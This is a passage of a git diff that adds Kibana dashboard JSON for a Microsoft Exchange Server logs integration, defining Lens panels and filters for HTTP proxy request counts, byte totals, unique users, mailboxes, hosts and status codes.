"name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cf08de60-285a-4631-a8bc-f82f2b0d8ff2:indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cf08de60-285a-4631-a8bc-f82f2b0d8ff2:5e5eebc9-c386-4646-acb3-dc5a73fcf3d5", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c49fa1b0-d063-47ef-aaea-ddbb86a55c5d:indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c49fa1b0-d063-47ef-aaea-ddbb86a55c5d:27ddc785-e09f-4f3c-9ecc-296dd4850ed7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c2941fdd-a809-4df1-9e6d-d7eee27beb94:indexpattern-datasource-layer-87a010e4-c30d-4e6f-bc3d-92243524aab9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c2941fdd-a809-4df1-9e6d-d7eee27beb94:dd24428d-5254-4f78-b5c6-9d86a5d91936", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c76a7520-c667-4361-b6d3-c4456707745c:indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c76a7520-c667-4361-b6d3-c4456707745c:babc91d8-a1dc-460e-91a5-d4ed43b2f403", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4b074730-0383-424e-94db-29a8e9147189:indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4b074730-0383-424e-94db-29a8e9147189:599c1b5b-7d55-4694-b3b2-7ba02c4753e6", + "type": "index-pattern" + }, + { + "id": "microsoft_exchange_server-ee0a5030-c03f-11ee-a682-0f218cc418af", + "name": "2028bea0-99d5-4ec6-a790-be7642c5a083:panel_2028bea0-99d5-4ec6-a790-be7642c5a083", + "type": "search" + }, + { + "id": "logs-*", + "name": "controlGroup_3d2a1e85-63b4-441e-ab8c-daa2649a4347:optionsListDataView", + "type": "index-pattern" + }, + { + "id": 
"logs-*", + "name": "controlGroup_fd53de73-57dd-43b2-bebb-568d827bb1c0:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_9ecedc0a-e663-453f-8749-a65c1a7afdb2:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_18aa9b9b-bcce-49ad-98b3-2f5922e86ec5:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/microsoft_exchange_server/kibana/dashboard/microsoft_exchange_server-8e9d55c5-637a-4fd8-b53b-9501e98a8e88.json b/packages/microsoft_exchange_server/kibana/dashboard/microsoft_exchange_server-8e9d55c5-637a-4fd8-b53b-9501e98a8e88.json new file mode 100644 index 00000000000..cbafca63307 --- /dev/null +++ b/packages/microsoft_exchange_server/kibana/dashboard/microsoft_exchange_server-8e9d55c5-637a-4fd8-b53b-9501e98a8e88.json 
@@ -0,0 +1,1492 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"a5fe2192-b77c-4f16-888e-4e59fe064c78\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"a5fe2192-b77c-4f16-888e-4e59fe064c78\",\"fieldName\":\"microsoft.exchange.anchormailbox\",\"title\":\"Anchormailbox\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"wildcard\",\"enhancements\":{}}},\"7c8291ec-dc6d-4fa0-8d67-bb53efdf6c57\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"7c8291ec-dc6d-4fa0-8d67-bb53efdf6c57\",\"fieldName\":\"microsoft.exchange.authenticateduser\",\"title\":\"Authenticated user\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"wildcard\",\"enhancements\":{}}},\"f542c63c-4265-4ebc-a9d6-7278f4d3976a\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"f542c63c-4265-4ebc-a9d6-7278f4d3976a\",\"fieldName\":\"microsoft.exchange.urlhost\",\"title\":\"URL Host\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"wildcard\",\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + 
"hidePanelTitles": true, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e6c91c87-ff12-4e3b-9ce7-b54ed4facc16", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "393ff722-36ef-4257-a95f-a704eeaab9fc" + ], + "columns": { + "393ff722-36ef-4257-a95f-a704eeaab9fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Requests", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "e6c91c87-ff12-4e3b-9ce7-b54ed4facc16", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "metricAccessor": "393ff722-36ef-4257-a95f-a704eeaab9fc" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 6, + "i": "d2e19276-b24c-4239-ab0f-3b9c328fb252", + "w": 8, 
+ "x": 0, + "y": 0 + }, + "panelIndex": "d2e19276-b24c-4239-ab0f-3b9c328fb252", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "952417c4-82da-4f1d-91c3-c7343981be3e" + ], + "columns": { + "952417c4-82da-4f1d-91c3-c7343981be3e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Requests Bytes", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "http.request.bytes" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9276c7a4-c750-4092-81d5-ea02cccadc91", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "metricAccessor": "952417c4-82da-4f1d-91c3-c7343981be3e" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 6, + "i": "8a0f3277-f4af-40f5-9526-0b8be36b2daf", + 
"w": 8, + "x": 8, + "y": 0 + }, + "panelIndex": "8a0f3277-f4af-40f5-9526-0b8be36b2daf", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "952417c4-82da-4f1d-91c3-c7343981be3e" + ], + "columns": { + "952417c4-82da-4f1d-91c3-c7343981be3e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Response Bytes", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "http.response.bytes" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9048201a-d0d3-42b8-bd95-4a8caaed9cef", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "metricAccessor": "952417c4-82da-4f1d-91c3-c7343981be3e" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 6, + "i": 
"8cd05d59-543a-4b41-9bdd-49b7b8e2cd31", + "w": 8, + "x": 16, + "y": 0 + }, + "panelIndex": "8cd05d59-543a-4b41-9bdd-49b7b8e2cd31", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "db318c6d-c8a9-4f58-89ce-3cafe82ddb9d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "952417c4-82da-4f1d-91c3-c7343981be3e" + ], + "columns": { + "952417c4-82da-4f1d-91c3-c7343981be3e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Users", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "microsoft.exchange.authenticateduser" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "db318c6d-c8a9-4f58-89ce-3cafe82ddb9d", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "metricAccessor": "952417c4-82da-4f1d-91c3-c7343981be3e" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 6, + "i": 
"3fdd01ea-f1a6-4aef-9f4c-ceb6d2c787ba", + "w": 8, + "x": 24, + "y": 0 + }, + "panelIndex": "3fdd01ea-f1a6-4aef-9f4c-ceb6d2c787ba", + "title": "", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7eefe26a-cbbb-424b-a989-b3be44ac08ed", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "952417c4-82da-4f1d-91c3-c7343981be3e" + ], + "columns": { + "952417c4-82da-4f1d-91c3-c7343981be3e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Mailboxes", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "microsoft.exchange.anchormailbox" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "7eefe26a-cbbb-424b-a989-b3be44ac08ed", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "metricAccessor": "952417c4-82da-4f1d-91c3-c7343981be3e" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 6, + "i": 
"fdf2a0a3-389d-4f7c-9684-5b8d1ed89c91", + "w": 8, + "x": 32, + "y": 0 + }, + "panelIndex": "fdf2a0a3-389d-4f7c-9684-5b8d1ed89c91", + "title": "", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b3936adc-f4db-45b1-845e-a13a7c890d2c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "952417c4-82da-4f1d-91c3-c7343981be3e" + ], + "columns": { + "952417c4-82da-4f1d-91c3-c7343981be3e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Hosts", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "microsoft.exchange.urlhost" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "b3936adc-f4db-45b1-845e-a13a7c890d2c", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "metricAccessor": "952417c4-82da-4f1d-91c3-c7343981be3e" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 6, + "i": 
"2997a185-6ea5-4e41-bd70-f5a46bd4e127", + "w": 8, + "x": 40, + "y": 0 + }, + "panelIndex": "2997a185-6ea5-4e41-bd70-f5a46bd4e127", + "title": "", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f50b399c-7fd8-43f7-8464-fcf7127eb0c4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "46fa66b7-9fa0-45f5-8e0b-c9ef86b8acc3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f50b399c-7fd8-43f7-8464-fcf7127eb0c4": { + "columnOrder": [ + "d782126e-8851-4571-9253-98e8f5dc345d", + "61f96ba6-2d0f-485b-aaff-28c6acf281db", + "bc81f4da-631d-49c4-b5c8-27de3d250b82" + ], + "columns": { + "61f96ba6-2d0f-485b-aaff-28c6acf281db": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bc81f4da-631d-49c4-b5c8-27de3d250b82": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count of requests", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d782126e-8851-4571-9253-98e8f5dc345d": { + "dataType": "string", + "isBucketed": true, + "label": "Top 3 values of host.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc81f4da-631d-49c4-b5c8-27de3d250b82", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "host.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + 
"layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "46fa66b7-9fa0-45f5-8e0b-c9ef86b8acc3", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bc81f4da-631d-49c4-b5c8-27de3d250b82" + ], + "layerId": "f50b399c-7fd8-43f7-8464-fcf7127eb0c4", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "d782126e-8851-4571-9253-98e8f5dc345d", + "xAccessor": "61f96ba6-2d0f-485b-aaff-28c6acf281db" + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "dataBounds" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {} + }, + "gridData": { + "h": 9, + "i": "b489c5cc-9794-46a7-9fe1-a5370fc7d4b3", + "w": 48, + "x": 0, + "y": 6 + }, + "panelIndex": "b489c5cc-9794-46a7-9fe1-a5370fc7d4b3", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + 
"type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2f74c5df-c534-4145-a74f-8489c346879e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "4653379e-f45d-4357-bc4d-aa3e9d96dced", + "02cf54a3-79f3-4c18-be82-96e2f2f2180a", + "393ff722-36ef-4257-a95f-a704eeaab9fc" + ], + "columns": { + "02cf54a3-79f3-4c18-be82-96e2f2f2180a": { + "dataType": "number", + "isBucketed": true, + "label": "Top 15 values of http.response.status_code", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "393ff722-36ef-4257-a95f-a704eeaab9fc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 15 + }, + "scale": "ordinal", + "sourceField": "http.response.status_code" + }, + "393ff722-36ef-4257-a95f-a704eeaab9fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Requests", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "4653379e-f45d-4357-bc4d-aa3e9d96dced": { + "dataType": "string", + "isBucketed": true, + "label": "Top 15 values of microsoft.exchange.urlhost", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "393ff722-36ef-4257-a95f-a704eeaab9fc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 15 + }, + "scale": "ordinal", + "sourceField": "microsoft.exchange.urlhost" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } 
+ }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "2f74c5df-c534-4145-a74f-8489c346879e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "legendDisplay": "hide", + "metrics": [ + "393ff722-36ef-4257-a95f-a704eeaab9fc" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "02cf54a3-79f3-4c18-be82-96e2f2f2180a", + "4653379e-f45d-4357-bc4d-aa3e9d96dced" + ] + } + ], + "palette": { + "name": "default", + "type": "palette" + }, + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "0720a83e-43d7-4993-8072-26be8aa3feb6", + "w": 16, + "x": 0, + "y": 15 + }, + "panelIndex": "0720a83e-43d7-4993-8072-26be8aa3feb6", + "title": "", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "af78ff4d-82f1-410b-8478-0732fffc9e5b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "4653379e-f45d-4357-bc4d-aa3e9d96dced", + "02cf54a3-79f3-4c18-be82-96e2f2f2180a", + "393ff722-36ef-4257-a95f-a704eeaab9fc" + ], + "columns": { + "02cf54a3-79f3-4c18-be82-96e2f2f2180a": 
{ + "dataType": "string", + "isBucketed": true, + "label": "Top 15 values of microsoft.exchange.authenticateduser", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "393ff722-36ef-4257-a95f-a704eeaab9fc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 15 + }, + "scale": "ordinal", + "sourceField": "microsoft.exchange.authenticateduser" + }, + "393ff722-36ef-4257-a95f-a704eeaab9fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Requests", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "4653379e-f45d-4357-bc4d-aa3e9d96dced": { + "dataType": "string", + "isBucketed": true, + "label": "Top 15 values of microsoft.exchange.urlhost", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "393ff722-36ef-4257-a95f-a704eeaab9fc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 15 + }, + "scale": "ordinal", + "sourceField": "microsoft.exchange.urlhost" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "af78ff4d-82f1-410b-8478-0732fffc9e5b", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": 
"microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "legendDisplay": "hide", + "metrics": [ + "393ff722-36ef-4257-a95f-a704eeaab9fc" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "02cf54a3-79f3-4c18-be82-96e2f2f2180a", + "4653379e-f45d-4357-bc4d-aa3e9d96dced" + ] + } + ], + "palette": { + "name": "default", + "type": "palette" + }, + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "70ef3233-def0-42d0-9b35-2e48221fcd16", + "w": 16, + "x": 16, + "y": 15 + }, + "panelIndex": "70ef3233-def0-42d0-9b35-2e48221fcd16", + "title": "", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c9c5c37e-da56-4106-b488-560a5da4a1f8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "4653379e-f45d-4357-bc4d-aa3e9d96dced", + "bf505ffa-e7ba-4202-b117-7f61e5e6fb8c" + ], + "columns": { + "4653379e-f45d-4357-bc4d-aa3e9d96dced": { + "dataType": "string", + "isBucketed": true, + "label": "Top 15 values of microsoft.exchange.authenticateduser", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bf505ffa-e7ba-4202-b117-7f61e5e6fb8c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + 
